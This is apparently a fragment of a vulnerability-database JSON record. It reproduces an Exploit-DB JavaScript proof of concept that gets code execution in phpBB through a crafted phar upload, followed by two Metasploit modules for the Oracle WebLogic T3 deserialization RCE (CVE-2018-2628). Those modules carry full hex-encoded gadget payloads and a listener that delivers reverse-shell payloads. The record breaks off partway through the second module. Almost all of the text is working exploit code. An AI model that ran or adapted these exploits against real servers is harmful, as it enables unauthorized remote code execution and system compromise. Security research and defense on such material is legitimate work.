"https://www.exploit-db.com/exploits/46513", "sourceData": "// All greets goes to RIPS Tech\r\n// Run this JS on Attachment Settings ACP page\r\nvar plupload_salt = '';\r\nvar form_token = '';\r\nvar creation_time = '';\r\nvar filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip\r\n// your payload here\r\nvar payload = '<?php __HALT_COMPILER(); ?>\\x0d\\x0a\\xfe\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x01'+'\\x00'.repeat(5)+'\\xc8\\x01\\x00\\x00O:31:\"GuzzleHttp\\x5cCookie\\x5cFileCookieJar\":4:{s:41:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00filename\";s:30:\"/var/www/html/phpBB3/pinfo.php\";s:52:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00storeSessionCookies\";b:1;s:36:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00cookies\";a:1:{i:0;O:27:\"GuzzleHttp\\x5cCookie\\x5cSetCookie\":1:{s:33:\"\\x00GuzzleHttp\\x5cCookie\\x5cSetCookie\\x00data\";a:3:{s:7:\"Expires\";i:1;s:7:\"Discard\";b:0;s:5:\"Value\";s:17:\"<?php phpinfo();#\";}}}s:39:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00strictMode\";N;}\\x08\\x00\\x00\\x00test.txt\\x04\\x00\\x00\\x00K>\\x10\\x5c\\x04\\x00\\x00\\x00\\x0c~\\x7f\\xd8\\xb6\\x01'+'\\x00'.repeat(6)+'test\\xa0\\x17\\xd2\\xe0R\\xcf \\xf6T\\x1d\\x01X\\x91(\\x9dD]X\\x0b>\\x02\\x00\\x00\\x00GBMB';\r\nvar byteArray = Uint8Array.from(payload, function(c){return c.codePointAt(0);});\r\nvar sid = (new URL(document.location.href)).searchParams.get('sid');\r\nvar url = '/adm/index.php';\r\nvar getparams = {\r\n 'i': 'acp_database',\r\n 'sid': sid,\r\n 'mode': 'backup'\r\n};\r\n$.get(url, getparams, function(data) {\r\n form_token = $(data).find('[name=\"form_token\"]').val();\r\n creation_time = $(data).find('[name=\"creation_time\"]').val();\r\n if(form_token && creation_time) {\r\n var posturl = '/adm/index.php?i=acp_database&sid=|&mode=backup&action=download';\r\n var postdata = {\r\n 'type': 'data',\r\n 'method': 'text',\r\n 
'where': 'download',\r\n 'table[]': 'phpbb_config',\r\n 'submit': 'Submit',\r\n 'creation_time': creation_time,\r\n 'form_token': form_token\r\n }\r\n $.post(posturl.replace(\"|\", sid), postdata, function (data) {\r\n plupload_salt = data.match(/plupload_salt',\\s*'(\\w{32})/)[1];\r\n if (plupload_salt) {\r\n filepath = filepath.replace(\"$salt\", plupload_salt);\r\n var postdata = new FormData();\r\n postdata.append('name', 'evil.zip');\r\n postdata.append('chunk', 0);\r\n postdata.append('chunks', 2);\r\n postdata.append('add_file', 'Add the file');\r\n postdata.append('real_filename', 'evil.zip');\r\n // file\r\n var pharfile = new File([byteArray], 'evil.zip');\r\n postdata.append('fileupload', pharfile);\r\n jQuery.ajax({\r\n url: '/posting.php?mode=reply&f=2&t=1',\r\n data: postdata,\r\n cache: false,\r\n contentType: false,\r\n processData: false,\r\n method: 'POST',\r\n success: function(data){\r\n if (\"id\" in data) {\r\n $('#img_imagick').val(filepath).focus();\r\n $('html, body').animate({\r\n scrollTop: ($('#submit').offset().top)\r\n }, 500);\r\n }\r\n }\r\n });\r\n\r\n }\r\n }, 'text');\r\n }\r\n});", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46513"}], "metasploit": [{"lastseen": "2018-08-28T09:31:33", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a serialized object to the interface to execute code on vulnerable hosts.", "published": "2018-08-09T16:35:14", "type": "metasploit", "title": "Oracle Weblogic Server Deserialization RCE", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-08-09T19:51:56", "id": "MSF:EXPLOIT/WINDOWS/MISC/WEBLOGIC_DESERIALIZE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 
'msf/core/exploit/powershell'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::TcpServer\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic\n Server T3 interface can send a serialized object to the interface to\n execute code on vulnerable hosts.\n },\n 'Author' =>\n [\n 'brianwrf', # EDB PoC\n 'Jacob Robles' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2018-2628'],\n ['EDB', '44553']\n ],\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => ['win']\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'RPORT' => 7001\n },\n 'DisclosureDate' => 'Apr 17 2018'))\n end\n\n def gen_resp\n pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\n pwrshl.gsub!(\"%COMSPEC%\", \"cmd.exe\")\n tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join\n\n mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')\n mycmd << tmp_dat\n\n # Response data taken from JRMPListener generated data:\n # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'\n # Modified captured network traffic bytes. 
Patch in command to run\n @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'\n @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'\n @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'\n @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'\n @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'\n @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'\n @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'\n @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'\n @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'\n @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'\n @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'\n @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'\n @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'\n @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'\n @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'\n @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'\n @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'\n @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'\n @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'\n @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'\n @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'\n @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'\n @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'\n @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'\n @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'\n @resp << 
'2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'\n @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'\n @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'\n @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'\n @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'\n @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'\n @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'\n @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'\n @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'\n @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'\n @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'\n @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'\n @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'\n @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'\n @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'\n @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'\n @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'\n @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'\n @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'\n @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'\n @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'\n @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'\n @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'\n @resp << 
'74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'\n @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'\n @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'\n @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'\n @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'\n @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'\n @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'\n @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'\n @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'\n @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'\n @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'\n @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'\n @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'\n @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'\n @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'\n @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'\n @resp << '673badd256e7e91d7b470200007078700000000174'\n\n @resp << mycmd\n\n @resp << '74'\n @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'\n @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'\n @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'\n @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'\n @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'\n @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'\n @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'\n @resp << '7e005a'\n end\n\n\n def on_client_connect(client)\n # Make sure to only sent one meterpreter payload to a 
host.\n # During testing the remote host called back up to 11 times\n # (or as long as the server was listening).\n vprint_status(\"Comparing host: #{client.peerhost}\")\n if @met_sent.include?(client.peerhost) then return end\n @met_sent << client.peerhost\n\n vprint_status(\"met_sent: #{@met_sent}\")\n\n # Response format determined by watching network traffic\n # generated by EDB PoC\n accept_conn = '4e00'\n raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join\n accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')\n accept_conn << raccept_conn\n accept_conn << '0000'\n accept_conn << client.peerport.to_s(16).rjust(4,'0')\n\n client.put([accept_conn].pack('H*'))\n client.put([@resp].pack('H*'))\n end\n\n def t3_handshake\n shake = '74332031322e322e310a41533a323535'\n shake << '0a484c3a31390a4d533a313030303030'\n shake << '30300a0a'\n\n sock.put([shake].pack('H*'))\n sleep(1)\n sock.get_once\n end\n\n def build_t3_request_object\n # data block is from EDB PoC\n data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'\n data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'\n data << '700000000a000000030000000000000006007070707070700000000a00000003'\n data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'\n data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'\n data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'\n data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'\n data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'\n data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'\n data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'\n data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'\n data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'\n data << 
'6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'\n data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'\n data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'\n data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'\n data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'\n data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'\n data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'\n data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\n data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'\n data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'\n data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'\n data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'\n data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'\n data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\n data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'\n data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'\n data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'\n data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'\n data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'\n data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'\n data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'\n data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'\n data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'\n data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'\n data 
<< '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'\n data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'\n data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'\n data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'\n data << '2d4147444d565155423154362e656883348cd6000000070000'\n\n data << rport.to_s(16).rjust(4, '0')\n\n data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'\n data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'\n data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'\n data << '863d1d0000000078'\n\n sock.put([data].pack('H*'))\n sleep(2)\n sock.get_once\n end\n\n def send_payload_objdata\n # JRMPClient2 payload generated from EDB PoC:\n # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2\n # Patch in srvhost and srvport\n payload = '056508000000010000001b0000005d0101007372017870737202787000000000'\n payload << '00000000757203787000000000787400087765626c6f67696375720478700000'\n payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'\n payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'\n payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'\n payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'\n payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'\n payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'\n payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'\n payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'\n payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'\n payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'\n payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'\n payload << 
'78707702000078fe010000'\n\n # Data\n payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'\n payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'\n payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'\n payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'\n payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'\n payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'\n payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'\n payload << '1e030000787077'\n\n unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join\n unicast_dat = '000a556e696361737452656600'\n unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')\n unicast_dat << unicast_srvhost\n unicast_dat << '0000'\n unicast_dat << srvport.to_s(16).rjust(4,'0')\n unicast_dat << '000000004e18654b000000000000000000000000000000'\n unicast_dat << '78'\n\n payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')\n payload << unicast_dat\n\n payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'\n payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'\n payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'\n payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'\n payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'\n payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'\n payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'\n payload << '6f3b290000001b7878fe00ff'\n\n data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')\n data << payload\n\n sock.put([data].pack('H*'))\n sleep(1)\n sock.put([data].pack('H*'))\n sleep(1)\n sock.get_once\n end\n\n def exploit\n @met_sent = []\n gen_resp\n\n connect\n vprint_status('Sending handshake...')\n t3_handshake\n\n 
build_t3_request_object\n\n start_service\n\n vprint_status('Sending payload...')\n send_payload_objdata\n\n # Need to wait this long to make sure we get a shell back\n sleep(10)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/misc/weblogic_deserialize.rb"}, {"lastseen": "2020-10-07T18:51:43", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a serialized object to the interface to execute code on vulnerable hosts.\n", "published": "2018-08-28T17:38:54", "type": "metasploit", "title": "Oracle Weblogic Server Deserialization RCE", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/powershell'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::TcpServer\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic\n Server T3 interface can send a serialized object to the interface to\n execute code on vulnerable hosts.\n },\n 'Author' =>\n [\n 'brianwrf', # EDB PoC\n 'Jacob Robles' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2018-2628'],\n ['EDB', '44553']\n ],\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Unix',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},\n 'Payload' => {\n 
'Encoder' => 'cmd/ifs',\n 'BadChars' => ' ',\n 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}\n }\n ],\n [ 'Windows',\n 'Platform' => 'win',\n 'Payload' => {},\n 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'RPORT' => 7001\n },\n 'DisclosureDate' => '2018-04-17'))\n end\n\n def check\n connect\n req = \"GET /console/login/LoginForm.jsp HTTP/1.1\\n\"\n req << \"Host: #{peer}\\n\\n\"\n sock.put(req)\n\n res = sock.get_once\n disconnect\n return CheckCode::Unknown unless res\n\n /WebLogic Server Version: (?<version>\\d+\\.\\d+\\.\\d+\\.*\\d*)/ =~ res\n if version\n version = Gem::Version.new(version)\n vprint_good(\"Detected Oracle WebLogic Server Version: #{version.to_s}\")\n\n case\n when version.to_s.start_with?('10.3')\n return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')\n when version.to_s.start_with?('12.1')\n return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')\n when version.to_s.start_with?('12.2')\n return CheckCode::Appears unless version > Gem::Version.new('12.2.1.3')\n end\n end\n\n if res.include?('Oracle WebLogic Server Administration Console')\n return CheckCode::Detected\n end\n\n CheckCode::Unknown\n end\n\n def gen_resp\n if target.name == 'Windows'\n pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})\n tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join\n else\n nix_cmd = payload.encoded\n nix_cmd.prepend('/bin/sh -c ')\n tmp_dat = nix_cmd.each_byte.map {|b| b.to_s(16)}.join\n end\n\n mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')\n mycmd << tmp_dat\n\n # Response data taken from JRMPListener generated data:\n # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'\n # Modified captured network traffic bytes. 
Patch in command to run\n @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'\n @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'\n @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'\n @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'\n @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'\n @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'\n @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'\n @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'\n @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'\n @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'\n @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'\n @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'\n @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'\n @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'\n @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'\n @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'\n @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'\n @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'\n @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'\n @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'\n @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'\n @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'\n @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'\n @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'\n @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'\n @resp << 
'2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'\n @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'\n @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'\n @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'\n @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'\n @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'\n @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'\n @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'\n @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'\n @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'\n @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'\n @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'\n @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'\n @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'\n @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'\n @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'\n @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'\n @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'\n @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'\n @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'\n @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'\n @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'\n @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'\n @resp << 
'74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'\n @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'\n @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'\n @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'\n @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'\n @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'\n @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'\n @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'\n @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'\n @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'\n @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'\n @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'\n @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'\n @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'\n @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'\n @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'\n @resp << '673badd256e7e91d7b470200007078700000000174'\n\n @resp << mycmd\n\n @resp << '74'\n @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'\n @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'\n @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'\n @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'\n @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'\n 